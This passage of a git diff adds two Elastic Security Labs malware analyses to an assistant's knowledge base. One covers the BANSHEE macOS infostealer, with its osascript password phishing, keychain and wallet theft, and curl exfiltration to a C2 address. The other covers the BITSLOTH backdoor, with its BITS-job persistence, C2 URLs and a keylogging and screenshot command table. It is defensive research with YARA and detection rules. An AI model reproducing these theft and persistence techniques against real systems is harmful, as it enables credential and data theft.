+description: "The BANSHEE malware is a macOS-based infostealer that targets system information, browser data, and cryptocurrency wallets."
+author:
+  - slug: elastic-security-labs
+image: "beyond-the-wail.jpg"
+category:
+  - slug: malware-analysis
+tags:
+  - macos
+  - infostealer
+  - BANSHEE
+---
+
+## Preamble
+
+In August 2024, a novel macOS malware named "BANSHEE Stealer" emerged, catching the attention of the cybersecurity community. Reportedly developed by Russian threat actors, BANSHEE Stealer was introduced on an underground forum and is designed to function across both macOS x86_64 and ARM64 architectures. 
+
+This malware presents a severe risk to macOS users, targeting vital system information, browser data, and cryptocurrency wallets.
+
+With a steep monthly subscription price of $3,000, BANSHEE Stealer stands out in the market, particularly compared to known stealers like AgentTesla. 
+
+As macOS increasingly becomes a prime target for cybercriminals, BANSHEE Stealer underscores the rising observance of macOS-specific malware. This analysis explores the technical details of BANSHEE Stealer, aiming to help the community understand its impact and stay informed about emerging threats.
+
+
+![Source: https://x.com/privacyis1st/status/1822948909670408573](/assets/images/beyond-the-wail/image2.png "Source: https://x.com/privacyis1st/status/1822948909670408573")
+
+## Key takeaways
+
+* BANSHEE Stealer highlights the growing number of macOS malware samples as the OS becomes a more attractive target for cyber threats.
+* BANSHEE Stealer's $3,000 monthly price is notably high compared to Windows-based stealers.
+* BANSHEE Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat.
+
+## Malware Analysis
+
+The malware we analyzed in this research contained all the C++ symbols, which is interesting as we can guess the project's code structure by knowing these source code file names, as seen in the picture below. Looking into the C++-generated global variable initialization functions, we can find values set automatically/manually by the user during the build process, like the remote IP, encryption key, build ID, etc.
+
+![Functions list that initialize the global variables of every source file](/assets/images/beyond-the-wail/image5.png "Functions list that initialize the global variables of every source file")
+
+The following table summarizes the leaked `.cpp` file names through the symbols in the binary.
+
+| File name      | Description                                                                                                          |
+|----------------|----------------------------------------------------------------------------------------------------------------------|
+| `Controller.cpp` | Manages core execution tasks, including anti-debugging measures, language checks, data collection, and exfiltration. |
+| `Browsers.cpp`   | Handles the collection of data from various web browsers.                                                            |
+| `System.cpp`     | Executes AppleScripts to gather system information and perform password phishing.                                    |
+| `Tools.cpp`      | Provides utility functions for encryption, directory creation, and compression etc.                                  |
+| `Wallets.cpp`    | Responsible for collecting data from cryptocurrency wallets.                                                         |
+
+### Debugger, VM Detection, and Language Checks
+
+![Checking for debugging, Virtualization, and the language of the machine](/assets/images/beyond-the-wail/image8.png "Checking for debugging, Virtualization, and the language of the machine")
+
+BANSHEE Stealer uses basic techniques to evade detection. It detects debugging by utilizing the [sysctl](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/sysctl.3.html) API.
+
+![Debugging detection with sysctl macOS API](/assets/images/beyond-the-wail/image1.png "Debugging detection with sysctl macOS API")
+
+For virtualization detection, it runs the command `system_profiler SPHardwareDataType | grep 'Model Identifier'` to determine whether the string `Virtual` appears in the hardware model identifier, which suggests a virtual machine. These methods are relatively simple and can be easily circumvented by advanced sandboxes and malware analysts.
+
+![Virtual machine check](/assets/images/beyond-the-wail/image7.png "Virtual machine check")
+
+Additionally, It parses the user-preferred canonicalized language returned from the [CFLocaleCopyPreferredLanguages ](https://developer.apple.com/documentation/corefoundation/1542887-cflocalecopypreferredlanguages) API and looks for the string `ru`. This tactic helps the malware avoid infecting systems where Russian is the primary language.
+
+### System information collection
+
+#### User password
+
+The malware creates an [Osascript](https://ss64.com/mac/osascript.html) password prompt with a dialog saying that to launch the application, you need to update the system settings. Please enter your password.
+
+When the user enters the password, it will be validated using the [dscl](https://ss64.com/mac/dscl.html) command by running `dscl Local/Default -authonly <username> <password>`
+
+If valid, the password will be written to the following file `/Users/<username>/password-entered`.
+
+![User password phishing through a prompt](/assets/images/beyond-the-wail/image3.png "User password phishing through a prompt")
+
+These credentials can be leveraged to decrypt the keychain data stored on the system, granting access to all saved passwords.
+
+#### File, software, and hardware information collection
+
+The function `System::collectSystemInfo` collects system information and serializes it in a JSON object. It executes the command `system_profiler SPSoftware DataType SPHardwareDataType`, which provides details about the system’s software and hardware. It gets the machine's public IP by requesting it from `freeipapi.com` through the built-in macOS `cURL` command.
+
+The JSON file will be saved under `<temporary_path>/system_info.json`
+
+BANSHEE stealer executes AppleScripts; interestingly, it writes the AppleScripts to the same file `/tmp/tempAppleScript`.
+
+The first script to be executed first mutes the system sound with `osascript -e 'set volume with output muted'` command. It then collects various files from the system, which are listed below:
+
+* Safari cookies
+* Notes database
+* Files with the following extensions `.txt`, `.docx`, `.rtf`, `.doc`, `.wallet`, `.keys`, or `.key` from the Desktop and Documents folders.
+
+#### Dump keychain passwords
+
+It copies the keychain of the system `/Library/Keychains/login.keychain-db` to `<temporary_path>/Passwords`
+
+### Browser collection
+
+BANSHEE collects data from 9 different browsers currently, including browser history, cookies, logins, etc:
+
+* Chrome
+* Firefox
+* Brave
+* Edge
+* Vivaldi
+* Yandex
+* Opera
+* OperaGX
+
+Regarding Safari, only the cookies are collected by the AppleScript script for the current version.
+
+![Web browser file collection](/assets/images/beyond-the-wail/image4.png "Web browser file collection")
+
+Additionally, data from approximately 100 browser plugins are collected from the machine. A list of these extension IDs is provided at the end of the blog post.
+
+The collected files are saved under `<temporary_path>/Browsers`.
+
+### Wallet collection
+
+* Exodus
+* Electrum
+* Coinomi
+* Guarda
+* Wasabi Wallet
+* Atomic
+* Ledger
+
+The collected wallets are stored under `<temporary_path>/Wallets`.
+
+### Exfiltration
+
+After the malware finishes collecting data, it first ZIP compresses the temporary folder using the `ditto` command. The zip file is then XOR encrypted and base64 encoded and sent through a post request to the URL: `http://45.142.122[.]92/send/` with the built-in cURL command.
+
+![Xor and base64 encoding of the zip file to be exfiltrated](/assets/images/beyond-the-wail/image6.png "Xor and base64 encoding of the zip file to be exfiltrated")
+
+## Behavior detection
+
+* [Crypto Wallet File Access by Unsigned or Untrusted Binary](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_crypto_wallet_file_access_by_unsigned_or_untrusted_binary.toml)
+* [Web Browser Credential Data Accessed by Unsigned or Untrusted Process](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_web_browser_credential_data_accessed_by_unsigned_or_untrusted_process.toml)
+* [Osascript Payload Drop and Execute](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/command_and_control_osascript_payload_drop_and_execute.toml)
+* [Potential Credentials Phishing via Osascript](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/macos/credential_access_potential_credentials_phishing_via_osascript.toml)
+
+## YARA rule
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the BANSHEE malware:
+
+```
+rule Macos_Infostealer_Banshee {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-08-13"
+        last_modified = "2024-08-13"
+        os = "MacOS"
+        arch = "x86, arm64"
+        category_type = "Infostealer"
+        family = "Banshee"
+        threat_name = "Macos.Infostealer.Banshee"
+        license = "Elastic License v2"
+
+    strings:
+        $str_0 = "No debugging, VM, or Russian language detected." ascii fullword
+        $str_1 = "Remote IP: " ascii fullword
+        $str_2 = "Russian language detected!" ascii fullword
+        $str_3 = " is empty or does not exist, skipping." ascii fullword
+        $str_4 = "Data posted successfully" ascii fullword
+        $binary_0 = { 8B 55 BC 0F BE 08 31 D1 88 08 48 8B 45 D8 48 83 C0 01 48 89 45 D8 E9 }
+        $binary_1 = { 48 83 EC 60 48 89 7D C8 48 89 F8 48 89 45 D0 48 89 7D F8 48 89 75 F0 48 89 55 E8 C6 45 E7 00 }
+    condition:
+        all of ($str_*) or all of ($binary_*)
+}
+```
+
+## Conclusion
+
+BANSHEE Stealer is macOS-based malware that can collect extensive data from the system, browsers, cryptocurrency wallets, and numerous browser extensions. Despite its potentially dangerous capabilities, the malware's lack of sophisticated obfuscation and the presence of debug information make it easier for analysts to dissect and understand. While BANSHEE Stealer is not overly complex in its design, its focus on macOS systems and the breadth of data it collects make it a significant threat that demands attention from the cybersecurity community.
+
+## Observables
+
+All observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/banshee) in both ECS and STIX format in a combined zip bundle.
+
+The following observables were discussed in this research.
+
+| Observable                                                       | Type      | Name            | Reference          |
+|------------------------------------------------------------------|-----------|-----------------|--------------------|
+| 11aa6eeca2547fcf807129787bec0d576de1a29b56945c5a8fb16ed8bf68f782 | SHA-256   | BANSHEE stealer |                    |
+| 45.142.122[.]92                                                  | ipv4-addr |                 | BANSHEE stealer C2 |
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bits_and_bytes_analyzing_bitsloth.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bits_and_bytes_analyzing_bitsloth.md
new file mode 100644
index 0000000000000..a42e72143e83b
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/bits_and_bytes_analyzing_bitsloth.md
@@ -0,0 +1,433 @@
+---
+title: "BITS and Bytes: Analyzing BITSLOTH, a newly identified backdoor"
+slug: "bits-and-bytes-analyzing-bitsloth"
+date: "2024-08-01"
+description: "Elastic Security Labs identified a novel Windows backdoor leveraging the Background Intelligent Transfer Service (BITS) for C2. This malware was found during a recent activity group tracked as REF8747."
+author:
+  - slug: seth-goodwin
+  - slug: daniel-stepanic
+image: "Security Labs Images 29.jpg"
+category:
+  - slug: malware-analysis
+---
+
+## BITSLOTH at a glance
+
+BITSLOTH is a newly discovered Windows backdoor that leverages the Background Intelligent Transfer Service (BITS) as its command-and-control mechanism. BITSLOTH was uncovered during an intrusion within the LATAM region earlier this summer. This malware hasn't been publicly documented to our knowledge and while it’s not clear who’s behind the malware, it has been in development for several years based on tracking distinct versions uploaded to VirusTotal.
+
+The most current iteration of the backdoor at the time of this publication has 35 handler functions including keylogging and screen capture capabilities. In addition, BITSLOTH contains many different features for discovery, enumeration, and command-line execution. Based on these capabilities, we assess this tool is designed for gathering data from victims.
+
+### Key takeaways
+
+ - BITSLOTH is a newly discovered Windows backdoor
+ - BITSLOTH uses a built-in Microsoft feature, Background Intelligent Transfer Service (BITS) for command-and-control communication 
+ - BITSLOTH has numerous command handlers used for discovery/enumeration, execution, and collection purposes
+ - The backdoor contains logging functions and strings consistent with the authors being native Chinese speakers
+
+## Discovery
+
+Our team observed BITSLOTH installed on a server environment on June 25th during REF8747, this was an intrusion into the Foreign Ministry of a South American government. The intrusion was traced back to PSEXEC execution on one of the infected endpoints. The attackers used a slew of publicly available tools for most of their operations with the exception of BITSLOTH.
+
+ - [RINGQ](https://github.com/T4y1oR/RingQ)
+ - [IOX](https://github.com/EddieIvan01/iox)
+ - [STOWAWAY](https://github.com/ph4ntonn/Stowaway)
+ - [GODPOTATO](https://github.com/BeichenDream/GodPotato)
+ - [NOPAC](https://github.com/Ridter/noPac)
+ - [MIMIKATZ](https://github.com/gentilkiwi/mimikatz)
+ - [PPLFAULT](https://github.com/gabriellandau/PPLFault)
+ - [CERTIFY](https://github.com/GhostPack/Certify)
+
+One of the primary mechanisms of execution was through a shellcode loading project called RINGQ. In a similar fashion to DONUTLOADER, RINGQ will convert any Windows executable and generate custom shellcode placing it into a file ( main.txt). This shellcode gets decrypted and executed in-memory. This technique is used bypass defenses that rely on hash blocklists or static signatures in some anti-malware products.
+
+![Screenshot of RingQ demo](/assets/images/bits-and-bytes-analyzing-bitsloth/image21.png)
+
+We observed RINGQ being used to load the IOX port forwarder. Note: The key in the image below is the hex conversion of “whoami”.
+
+![RINGQ loading and executing IOX](/assets/images/bits-and-bytes-analyzing-bitsloth/image13.png)
+
+Additionally the attackers used the STOWAWAY utility to proxy encrypted traffic over HTTP to their C2 servers. Proxy tools, tunnelers, and redirectors are commonly used during intrusions to conceal the adversary responsible for an intrusion. These tools offer adversaries various features, including the ability to bypass internal network controls, provide terminal interfaces, encryption capabilities as well as file transfer options.
+
+![STOWAWAY proxy usage](/assets/images/bits-and-bytes-analyzing-bitsloth/image19.png)
+
+After initial access, the actor moved laterally and dropped BITSLOTH in the form of a DLL (```flengine.dll```) inside the ProgramData directory. The actor then executed the music-making program FL Studio (```fl.exe```). Based on the observed call stack associated with the self-injection alert, we confirmed the threat actor used a traditional side-loading technique using a signed version of [FL Studio](https://www.virustotal.com/gui/file/75747c8b5b3676abde25a8dd66280908c0d0fc57ef054b88a41673619d3bee28/details). 
+
+```
+  c:\windows\syswow64\ntdll.dll!0x770841AC
+  c:\windows\syswow64\ntdll.dll!0x7709D287
+  c:\windows\syswow64\kernelbase.dll!0x76ED435F
+  c:\windows\syswow64\kernelbase.dll!0x76ED42EF
+  Unbacked!0x14EAB23
+  Unbacked!0x14EA8B6
+  c:\programdata\pl studio\flengine.dll!0x74AD2F2E
+  c:\programdata\pl studio\fl.exe!0xDB3985
+  c:\programdata\pl studio\fl.exe!0xDB3E5E
+  c:\programdata\pl studio\fl.exe!0xDB4D3F
+  c:\windows\syswow64\kernel32.dll!0x76B267F9
+  c:\windows\syswow64\ntdll.dll!0x77077F4D
+  c:\windows\syswow64\ntdll.dll!0x77077F1B
+```
+
+This call stack was generated along with a process injection alert, and enabled researchers to extract an in-memory DLL that was set with Read/Write/Execute(RWX) page protections.
+
+#### BITSLOTH overview
+
+During our analysis, we found several older BITSLOTH samples demonstrating a record of development since December 2021. Within this project, the malware developer chose notable terminology– referring to BITSLOTH as the ```Slaver``` component and the command and control server as the ```Master``` component. Below is an example of one of the PDB file paths linked to BITSLOTH that depicts this:
+
+![PDB linked to BITSLOTH sample](/assets/images/bits-and-bytes-analyzing-bitsloth/image7.png)
+
+BITSLOTH employs no obfuscation around control flow or any kind of string encryption.
+
+![BITSLOTH strings](/assets/images/bits-and-bytes-analyzing-bitsloth/image9.png)
+
+Both older and recent samples contain strings used for logging and debugging purposes. As an example at startup, there is a string referenced in the read-only section (```.rdata```). 
+
+![Debugging](/assets/images/bits-and-bytes-analyzing-bitsloth/image24.png) 
+
+This Simplified Chinese wide-character string translates to:
+```Note: There is already a program running, do not run it again…```
+
+![String left by developer](/assets/images/bits-and-bytes-analyzing-bitsloth/image29.png)
+
+These small snippets contained within BITSLOTH help shed light on the development and prioritization of features, along with what appear to be operator instructions. In the latest version, a new scheduling component was added by the developer to control specific times when BITSLOTH should operate in a victim environment. This is a feature we have observed in other modern malware families such as [EAGERBEE](https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set).
+
+![BITSLOTH scheduling component](/assets/images/bits-and-bytes-analyzing-bitsloth/image27.png)
+
+## BITSLOTH code analysis
+
+BITSLOTH is a backdoor with many different capabilities including:
+
+ - Running and executing commands
+ - Uploading and downloading files
+ - Performing enumeration and discovery 
+ - Collecting sensitive data through keylogging and screen capturing
+
+### Mutex
+
+BITSLOTH uses a hard-coded mutex (```Global\d5ffff77ff77adad657658```) within each sample to ensure only one instance is running at a time. 
+
+![Mutex used by BITSLOTH](/assets/images/bits-and-bytes-analyzing-bitsloth/image6.png)
+
+### Communication
+
+BITSLOTH adopts a traditional client/server architecture, the developer refers to the client as the ```Slaver``` component and the command and control server (C2) as the ```Master``` component. The developer embeds the IP/port of the C2 server in each sample with a front-loaded string (```rrrr_url```). This string acts as a key to identify the C2 configuration in itself while running in memory, this is used when updating the C2 server.
+
+Below are the configurations in several samples our team has observed, the threat actor configures both internal and external IP ranges.
+
+```
+rrrr_url216.238.121[.]132:8443
+rrrr_url192.168.1[.]125:8443 
+rrrr_url192.168.1[.]124:8443
+rrrr_url45.116.13[.]178:443
+```
+
+One of the defining features of BITSLOTH is using the [Background Intelligent Transfer Service](https://learn.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) (BITS) for C2. While this feature has been designed to facilitate the network transfer of files between two machines, it’s been [abused](https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/) by multiple state-sponsored groups and continues to fly under the radar against organizations. This medium is appealing to adversaries because many organizations still struggle to monitor BITS network traffic and detect unusual BITS jobs.
+
+> Windows has a system administration feature called Background Intelligent Transfer Service (BITS) enabling the download and upload of files to HTTP web servers or SMB shares. The BITS service employs multiple features during the file transfer process such as the ability to pause/resume transfers, handling network interruptions, etc. BITS traffic is usually associated with software updates therefore wrongfully implied as trusted. Many organizations lack visibility into BITS network traffic making this an appealing target.
+
+The BITS API is exposed through Window’s [Component Object Model](https://learn.microsoft.com/en-us/windows/win32/com/component-object-model--com--portal) (COM) using the **IBackgroundCopyManager** [interface](https://learn.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager). This interface provides capabilities to create new jobs, enumerate existing jobs in the transfer queue, and access a specific job from a transfer queue.
+
+![Initializing IBackgroundCopyManager interface](/assets/images/bits-and-bytes-analyzing-bitsloth/image12.png)
+
+After initialization, BITSLOTH cancels any existing BITS jobs on the victim machine that match the following display names:
+
+ - ```WU Client Download```
+ - ```WU Client Upload```
+ - ```WU Client Upload R```
+
+These names are used by the developer to blend in and associate the different BITS transfer jobs with their respective BITS [job type](https://learn.microsoft.com/en-us/windows/win32/api/bits/ne-bits-bg_job_type). By canceling any existing jobs, this allows the execution of the malware to operate from a clean state.
+
+![Switch statement inside BITSLOTH to process BITS job](/assets/images/bits-and-bytes-analyzing-bitsloth/image17.png)
+
+Below are the Microsoft definitions matching the type of BITS job:
+
+ - **BG_JOB_TYPE_DOWNLOAD** - Specifies that the job downloads files to the client.
+ - **BG_JOB_TYPE_UPLOAD** - Specifies that the job uploads a file to the server.
+ - **BG_JOB_TYPE_UPLOAD_REPLY** - Specifies that the job uploads a file to the server, and receives a reply file from the server application.
+
+After canceling any existing jobs, the MAC address and operating system information are retrieved and placed into global variables. A new thread gets created, configuring the auto-start functionality. Within this thread, a new BITS download job is created with the name (```Microsoft Windows```).
+
+![BITS job creation for auto-start functionality](/assets/images/bits-and-bytes-analyzing-bitsloth/image18.png)
+
+This download job sets the destination URL to ```http://updater.microsoft[.]com/index.aspx```. While this domain is not routable, BITSLOTH masquerades this BITS job using a benign looking domain as a cover then uses **SetNotifyCmdLine** to execute the malware when the transfer state is changed.
+
+![Setting up BITS persistence via SetNotifyCmdLine](/assets/images/bits-and-bytes-analyzing-bitsloth/image28.png)
+
+Interestingly, this unique toolmark allowed us to pivot to additional samples showing this family has been in circulation for several years. 
+ 
+![VirusTotal relationships from embedded Microsoft URL](/assets/images/bits-and-bytes-analyzing-bitsloth/image4.png)
+
+At this point, the malware has now been configured with persistence via a BITS job named ```Microsoft Windows```. Below is a screenshot of this job’s configuration showing the notification command line set to the BITSLOTH location (```C:\ProgramData\Media\setup_wm.exe```)
+
+![BITSLOTH persistence job](/assets/images/bits-and-bytes-analyzing-bitsloth/image33.png)
+
+Once BITSLOTH becomes active, it will start requesting instructions from the C2 server using the ```WU Client Download``` job. This request URL is generated by combining the MAC address with a hard-coded string (```wu.htm```). Below is an example URL:
+
+```
+https://192.168.182.130/00-0C-29-0E-29-87/wu.htm
+```
+
+In response to this request, the malware will then receive a 12-byte structure from the C2 server containing a unique ID for the job, command ID for the handler, and a response token. Throughout these exchanges of file transfers, temporary files from the victim machine are used as placeholders to hold the data being transmitted back and forth, BITSLOTH uses a filename starting with characters (```wm```) appended by random characters.
+
+
+![Data exchange through temporary files](/assets/images/bits-and-bytes-analyzing-bitsloth/image25.png)
+
+### Command functionality
+
+BITSLOTH uses a command handler with 35 functions to process specific actions that should be taken on the victim machine. The malware has the option to be configured with HTTP or HTTPS and uses a hardcoded single byte XOR (```0x2```) to obfuscate the incoming instructions from the C2 server. The outbound requests containing the collected victim data have no additional protections by the malware itself and are sent in plaintext. 
+
+In order to move fast, our team leveraged a helpful Python [implementation](https://github.com/SafeBreach-Labs/SimpleBITSServer) of a BITS server released by [SafeBreach Labs](https://www.safebreach.com/). By setting the C2 IP to our loopback address inside a VM, this allowed us to get introspection on the network traffic. 
+
+![BITSLOTH command handler](/assets/images/bits-and-bytes-analyzing-bitsloth/image2.png)
+
+The handlers all behave in a similar approach performing a primary function then writing the data returned from the handler to a local temporary file. These temporary files then get mapped to a BITS upload job called ```WU Client Upload```. Each handler uses its own string formatting to create a unique destination URL. Each filename at the end of the URL uses a single letter to represent the type of data collected from the host, such as ```P.bin``` for processes or ```S.bin``` for services.
+
+```
+http://192.168.182.130/00-0C-29-0E-29-87/IF/P.bin
+```
+
+Below is an example screenshot showing the process enumeration handler with the string formatting and how this data is then linked to the BITS upload job.
+
+![BITSLOTH handler for running processes](/assets/images/bits-and-bytes-analyzing-bitsloth/image31.png)
+
+This link to the exfiltrated data can also be observed by viewing the BITS upload job directly. In the screenshots below, we can see the destination URL (C2 server) for the upload and the temporary file (```wm9F0C.tmp```) linked to the job.
+
+![BITS upload job configuration](/assets/images/bits-and-bytes-analyzing-bitsloth/image15.png)
+
+If we look at the temporary file, we can see the collected process information from the victim host.
+
+![Contents of temporary file holding exfiltrated data](/assets/images/bits-and-bytes-analyzing-bitsloth/image26.png)
+
+Soon after the upload job is created, the data is sent over the network through a BITS_POST request containing the captured data.
+
+![Outbound BITS_POST request](/assets/images/bits-and-bytes-analyzing-bitsloth/image22.png)
+
+### Command handling table
+
+| Command ID | Description |
+| ----- | ----- |
+| 0 | Collect running processes via **WTSEnumerateProcessesW** |
+| 1 | Get Windows services via **EnumServicesStatusW** |
+| 2 | Get system information via ```systeminfo``` command |
+| 3 | Retrieve all top-level Windows via **EnumWindows** |
+| 5 | Collect file listings |
+| 6 | Download file from C2 server |
+| 7 | Upload file to C2 server |
+| 10 | Terminate itself |
+| 11 | Set communication mode to HTTPS |
+| 12 | Set communication mode to HTTP |
+| 13 | Remove persistence |
+| 14 | Reconfigure persistence |
+| 15 | Cancel BITS download job (```WU Client Download```) |
+| 16 | Remove persistence and delete itself |
+| 17 | Thread configuration |
+| 18 | Duplicate of handler #2 |
+| 19 | Delete file based on file path |
+| 20 | Delete folder based on file path |
+| 21 | Starts terminal shell using stdin/stdout redirection |
+| 22 | Resets terminal handler (#21) |
+| 23 | Runs Windows tree command |
+| 24 | Updates BITSLOTH, delete old version |
+| 25 | Shutdown the machine via **ExitWindowsEx** |
+| 26 | Reboot the machine via **ExitWindowsEx** |
+| 27 | Log user off from the machine via **ExitWindowsEx** |
+| 28 | Terminate process based on process identifier (PID) |
+| 29 | Retrieves additional information via ```msinfo32``` command |
+| 30 | Execute individual file via **ShellExecuteW** |
+| 34 | Create new directory via **CreateDirectoryW** |
+| 41 | Upload data to C2 server | 
+| 42 | Checks for capture driver via **capGetDriverDescriptionW** |
+| 43 | Take screenshots of victim machine desktop |
+| 44 | Record keystrokes from victim machine |
+| 45 | Stop recording screenshot images |
+| 46 | Stop keylogger functionality |
+
+### Backdoor functionality
+
+BITSLOTH includes a wide range of post-compromise capabilities for an adversary to operate within a victim environment. We will focus on the more significant capabilities by grouping them into different categories.
+
+#### Discovery/enumeration
+
+A portion of the BITSLOTH handlers are focused on retrieving and enumerating data from victim machines. This includes:
+
+ - Retrieving process information via **WTSEnumerateProcessesW**
+ - Collecting Windows services via **EnumServicesStatusW**
+ - Enumerating all top-level Windows via **EnumWindows** with a callback function
+ - Retrieving system information via windows utilities such as ```systeminfo``` and ```msinfo32```
+
+![BITSLOTH handler used to collect system information](/assets/images/bits-and-bytes-analyzing-bitsloth/image14.png)
+
+In many of the handlers, the locale version is configured to ```chs ```(Chinese - Simplified).
+
+![Retrieve Windows information](/assets/images/bits-and-bytes-analyzing-bitsloth/image16.png)
+
+BITSLOTH has a couple custom enumeration functions tied to retrieving file listings and performing directory tree searches. The file listing handler takes a custom parameter from the operator to target specific folder locations of interest:
+
+ - **GET_DESKDOP** → **CSIDL_DESKTOPDIRECTORY** (Desktop)
+ - **GET_BITBUCKET** -> **CSIDL_BITBUCKET** (Recycle Bin)
+ - **GET_PERSONAl** -> **CSIDL_MYDOCUMENTS** (My Documents)
+
+![File listing parameters via BITSLOTH](/assets/images/bits-and-bytes-analyzing-bitsloth/image10.png)
+
+BITSLOTH also has the ability to collect entire directory/file listings on the machine for every file by using the Windows [tree](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tree) utility. This handler loops across the alphabet for each drive letter where the data is then saved locally in a temporary file named ```aghzyxklg```. 
+
+![Tree listing via BITSLOTH](/assets/images/bits-and-bytes-analyzing-bitsloth/image1.png)
+
+The tree data is then compressed and sent to the C2 server with a .ZIP extension. Below is an example of the collected data. This data can help pinpoint sensitive files or provide more context about the target environment. 
+
+![Example of data collected through **GetDirectoryTree** handler](/assets/images/bits-and-bytes-analyzing-bitsloth/image5.png)
+
+#### Collection
+
+In terms of collection, there are a few handlers used for actively gathering information. These are centered around capturing screenshots from the desktop and performing keylogging functionality.
+
+BITSLOTH implements a lightweight function used to identify capture recording devices, this appears to be a technique to check for a camera using the Windows API (**capGetDriverDescriptionW**). 
+
+![Handler that records capture devices](/assets/images/bits-and-bytes-analyzing-bitsloth/image30.png)
+
+BITSLOTH has the ability to take screenshots based on parameters provided by the operator. Input to this function uses a separator (```||```) where the operator provides the number of seconds of the capture interval and the capture count. The images are stored as BMP files with a hard coded name ```ciakfjoab``` and compressed with the DEFLATE algorithm using a ```.ZIP``` archive. These timestamped zipped archives are then sent out to the C2 server.
+
+The handler leverages common screenshot APIs such as **CreateCompatibleBitmap** and **BitBlt** from ```Gdi32.dll```.
+
+![BITSLOTH screen capture using Windows APIs](/assets/images/bits-and-bytes-analyzing-bitsloth/image32.png)
+
+For recording keystrokes, BITSLOTH uses traditional techniques by monitoring key presses using **GetAsyncKeyState**/**GetKeyState**. The handler has an argument for the number of seconds to perform the keylogging. This data is also compressed in a ```.ZIP``` file and sent outbound to the C2 server.
+
+![Keylogger functionality inside BITSLOTH](/assets/images/bits-and-bytes-analyzing-bitsloth/image8.png)
+
+#### Execution / Maintenance
+
+BITSLOTH has multiple capabilities around maintenace and file execution as well as standard backdoor functionalities such as:
+
+ - Capability to execute files stand-alone via **ShellExecuteW**
+ - Windows terminal capability to execute commands and read data back via pipes
+ - Create directories, perform reboots, shutdown the machine, terminate processes
+ - Perform file upload and download between C2 server
+ - Modify BITSLOTH configuration such as communication modes, update C2 URL, turn off keylogging/screenshot features
+
+![BITSLOTH’s CMD terminal](/assets/images/bits-and-bytes-analyzing-bitsloth/image11.png)
+
+## BITSLOTH pivots
+
+BITSLOTH appears to be actively deployed. We identified another BITSLOTH C2 server (```15.235.132[.]67```) using the same port (```8443```) with the same [SSL certificate](https://www.shodan.io/search?query=ssl.cert.serial%3A253c1c0bbf58e1f509fc4468de462ed8872f81d9) used from our intrusion. 
+
+![Shodan SSL certificate matches](/assets/images/bits-and-bytes-analyzing-bitsloth/image20.png)
+
+While it’s not exactly clear who’s behind BITSLOTH, there was a large amount of activity of VirusTotal uploads occurring on December 12, 2021. With around 67 uploads over 24 hours from one submitter (```1fcc35ea```), we suspect someone linked to this project was validating detections, making modifications, and uploading different versions of BITSLOTH to VirusTotal. One sample was packed with VMProtect, others stripped of functionality, some uploads were debug builds, etc.
+
+![BITSLOTH - VirusTotal Submitter (```1fcc35ea```)](/assets/images/bits-and-bytes-analyzing-bitsloth/image23.png)
+
+A lot of time has passed since then, but it is interesting seeing this family show up in a recent intrusion. Whatever the objective behind this malware, it's surprising that this family remained under the radar for so many years.
+
+![Different PDB paths from BITSLOTH uploads](/assets/images/bits-and-bytes-analyzing-bitsloth/image3.png)
+
+### REF 8747 through MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+[h4] Tactics
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+ - [Collection](https://attack.mitre.org/tactics/TA0009/)
+ - [Command and Control](https://attack.mitre.org/tactics/TA0011/)
+ - [Discovery](https://attack.mitre.org/tactics/TA0007/)
+ - [Execution](https://attack.mitre.org/tactics/TA0002/)
+ - [Exfiltration](https://attack.mitre.org/tactics/TA0010/)
+ - [Persistence](https://attack.mitre.org/tactics/TA0003/)
+ 
+#### Techniques
+
+Techniques represent how an adversary achieves a tactical goal by performing an action.
+
+ - [BITS Jobs](https://attack.mitre.org/techniques/T1197/)
+ - [System Information Discovery](https://attack.mitre.org/techniques/T1082/)
+ - [Hijack Execution Flow: DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/)
+ - [Screen Capture](https://attack.mitre.org/techniques/T1113/)
+ - [Input Capture: Keylogging](https://attack.mitre.org/techniques/T1056/001/)
+ - [Proxy](https://attack.mitre.org/techniques/T1090/)
+
+## Detecting REF8747
+
+### Detection
+
+The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:
+
+ - [Persistence via BITS Job Notify Cmdline](https://github.com/elastic/endpoint-rules/blob/0f01f1a9e2ac08e9ead74cafd4d73cb8166f9fc8/rules/windows/persistence_execution_via_bits_setnotifycmdline_method.toml)
+ - [LSASS Access Attempt via PPL Bypass](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_lsass_access_attempt_via_ppl_bypass.toml)
+ - [LSASS Access Attempt from an Unsigned Executable](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_lsass_access_attempt_from_an_unsigned_executable.toml)
+ - [Suspicious Parent-Child Relationship](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_suspicious_parent_child_relationship.toml)
+ - [Credential Access via Known Utilities](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/credential_access_credential_access_via_known_utilities.toml)
+ - Shellcode Injection
+
+#### YARA Signatures
+
+ - [Windows.Hacktool.Mimikatz](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Hacktool_Mimikatz.yar)
